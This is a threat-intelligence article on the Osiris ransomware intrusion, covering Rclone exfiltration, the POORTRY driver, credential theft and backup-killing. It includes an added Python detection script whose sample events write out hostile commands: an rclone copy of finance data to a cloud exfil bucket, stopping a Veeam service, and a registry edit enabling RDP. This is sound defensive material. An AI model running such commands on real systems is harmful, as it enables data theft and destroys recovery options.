Osiris Ransomware Family
Cybersecurity researchers have revealed a previously undocumented ransomware family dubbed Osiris, following an attack against a major food service franchise operator in Southeast Asia in November 2025. Analysis indicates that this is a newly developed ransomware strain and not related to the Osiris variant observed in December 2016 that was derived from Locky. The identity of the developers remains unknown, and there is no confirmation that the malware is offered as part of a Ransomware-as-a-Service operation.
Attack Chain and Initial Compromise
The earliest confirmed malicious activity on the victim network involved the exfiltration of sensitive data prior to ransomware deployment. Attackers transferred information using Rclone to cloud storage buckets hosted on Wasabi. This phase was followed by the staged introduction of tooling to establish control, move laterally, and prepare the environment for encryption.
A variety of living-off-the-land and dual-use utilities were leveraged, along with remote management components, to blend into normal administrative activity and minimize early detection.
Suspected Links to INC Ransomware Operations
Several indicators suggest potential overlap with actors previously associated with the INC ransomware (also known as Warble). Notably, the attackers used a version of Mimikatz bearing the same filename, kaz.exe, which has been observed in earlier INC-related incidents. Additionally, the exfiltration infrastructure and tradecraft closely mirror techniques previously attributed to that ecosystem, although no definitive attribution has been established.
The POORTRY Driver and BYOVD Tactics
A central feature of the intrusion was the deployment of a malicious driver known as POORTRY, used in a bring-your-own-vulnerable-driver (BYOVD) style attack to neutralize endpoint defenses. Unlike traditional BYOVD operations that rely on legitimate but flawed drivers, POORTRY is a bespoke driver engineered specifically to elevate privileges and terminate security tools.
The environment was further prepared using KillAV, a known utility for loading vulnerable drivers to disable protective software. Remote Desktop Protocol was also enabled, likely to facilitate persistent interactive access.
Capabilities of the Osiris Ransomware
Osiris has been described as a mature and effective encryption payload, likely operated by experienced threat actors. It implements a hybrid cryptographic model and generates a unique encryption key for each file, significantly complicating recovery efforts. The ransomware supports extensive configuration, allowing operators to fine-tune execution to the victim environment.
Key functional features include:
- Stopping services, terminating processes, and disabling backups or recovery mechanisms.
- Defining targeted folders and file extensions, and generating a customized ransom note upon completion.
By default, Osiris is configured to aggressively terminate processes and services associated with productivity software, email servers, browsers, text editors, Volume Shadow Copy, and enterprise backup platforms such as Veeam.
Tooling Used to Support the Intrusion
Beyond the ransomware itself, the attackers relied on a toolkit of reconnaissance, lateral movement, and remote management utilities to maintain operational control. Tools observed during the intrusion included:
- Netscan and Netexec for network discovery and execution.
- MeshAgent and a customized build of the Rustdesk remote desktop application for persistent remote access.
- Rclone for automated data exfiltration to cloud storage.
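The attack chain, tooling and default service-killing behaviour described above map fairly directly onto endpoint telemetry. The following is an added example, not code from the original article or from the researchers it cites: a small set of triage rules, in Python, run over constructed Sysmon-style process-creation and driver-load records. The rules key on behaviours the article names (Rclone pushing data to a named cloud remote, the kaz.exe Mimikatz filename, stopping Veeam or Volume Shadow Copy components, enabling RDP, loading a driver from outside the driver store, and MeshAgent/RustDesk execution). The sample events, the `driver.sys` filename and the use of the `fDenyTSConnections` registry value as the RDP switch are assumptions made here for illustration; the path-based driver heuristic is deliberately simple.

```python
"""Added example (not part of the original article): triage rules for the
Osiris intrusion pattern, evaluated over constructed Sysmon-style events.
Nothing below is incident data; every record is made up for this example."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str             # "process" (process creation) or "driver" (driver load)
    image: str            # full path of the executable or driver file
    cmdline: str = ""     # command line, process events only
    signed: bool = True   # code-signing status, driver events only


# Backup / recovery components the article says Osiris stops by default.
BACKUP_HINTS = ("veeam", "vss", "shadow")
# Remote-management tools the article lists.
REMOTE_TOOLS = ("meshagent", "rustdesk")
# Mimikatz filename the article ties to earlier INC-related incidents.
CRED_THEFT_NAMES = ("kaz.exe",)
# Windows driver store; loads from elsewhere deserve a look (assumption: a
# plain path prefix check is enough for this illustration).
DRIVER_STORE = r"c:\windows\system32\drivers"


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rule_rclone_exfil(ev: Event) -> bool:
    """rclone copying/syncing to a named remote (a 'name:' token that is not a drive letter path)."""
    cl = ev.cmdline.lower()
    return (ev.kind == "process" and _basename(ev.image) == "rclone.exe"
            and re.search(r"\b(copy|sync|move)\b", cl) is not None
            and re.search(r"\b\w+:(?![\\/])", cl) is not None)


def rule_cred_theft_name(ev: Event) -> bool:
    """Executable name the article associates with the Mimikatz build seen in INC incidents."""
    return ev.kind == "process" and _basename(ev.image) in CRED_THEFT_NAMES


def rule_backup_tampering(ev: Event) -> bool:
    """net/sc stop or taskkill aimed at backup or shadow-copy components."""
    cl = ev.cmdline.lower()
    stopping = re.search(r"\b(net|sc)\s+stop\b", cl) is not None or "taskkill" in cl
    return ev.kind == "process" and stopping and any(h in cl for h in BACKUP_HINTS)


def rule_rdp_enabled(ev: Event) -> bool:
    """fDenyTSConnections set to 0 under the Terminal Server key enables RDP (assumed method)."""
    cl = ev.cmdline.lower()
    return (ev.kind == "process" and "fdenytsconnections" in cl
            and re.search(r"/d\s+0\b", cl) is not None)


def rule_driver_load(ev: Event) -> bool:
    """Driver loaded unsigned or from outside the driver store (BYOVD / POORTRY style)."""
    return ev.kind == "driver" and (not ev.signed or not ev.image.lower().startswith(DRIVER_STORE))


def rule_remote_tool(ev: Event) -> bool:
    """Remote-management agents the article names (MeshAgent, RustDesk)."""
    return ev.kind == "process" and any(t in _basename(ev.image) for t in REMOTE_TOOLS)


RULES = {
    "rclone_exfil": rule_rclone_exfil,
    "cred_theft_name": rule_cred_theft_name,
    "backup_tampering": rule_backup_tampering,
    "rdp_enabled": rule_rdp_enabled,
    "driver_load": rule_driver_load,
    "remote_tool": rule_remote_tool,
}


def evaluate(events):
    """Return (rule_name, event_index) pairs for every rule that fires on an event."""
    return [(name, i) for i, ev in enumerate(events) for name, rule in RULES.items() if rule(ev)]


# Constructed sample events: one benign process, one benign driver, and one
# record per behaviour the article describes. The service name, bucket name and
# driver filename are made up for this example.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    Event("process", r"C:\Users\Public\rclone.exe", r"rclone.exe copy C:\Finance wasabi:exfil-bucket"),
    Event("process", r"C:\Users\Public\kaz.exe", "kaz.exe"),
    Event("process", r"C:\Windows\System32\net.exe", "net stop VeeamBackupSvc"),
    Event("process", r"C:\Windows\System32\reg.exe",
          r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    Event("driver", r"C:\Users\Public\driver.sys", signed=False),
    Event("process", r"C:\ProgramData\rustdesk.exe", "rustdesk.exe --service"),
    Event("driver", r"C:\Windows\System32\drivers\tcpip.sys"),
]

if __name__ == "__main__":
    for name, idx in evaluate(SAMPLE_EVENTS):
        print(f"{name:18s} event[{idx}] {SAMPLE_EVENTS[idx].image}")
```

Run stand-alone, the script flags six of the eight constructed events and leaves the svchost and tcpip.sys records alone. The value of this kind of rule set is correlation rather than any single match: an rclone push to a cloud remote, a stopped Veeam service and a driver loaded from a user-writable path within the same host and time window is the sequence the article describes, and together they warrant escalation even when each line would be tolerable on its own.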
Implications for the Evolving Extortion Landscape
While encrypting ransomware continues to pose a significant risk to organizations, this incident highlights a broader evolution toward multi-faceted extortion campaigns. The increasing emphasis on data theft, defense evasion through malicious drivers, and the growing prevalence of encryptionless or hybrid attacks are expanding the threat landscape. As a result, ransomware is becoming just one component within a wider, more complex extortion ecosystem that demands equally adaptive defensive strategies.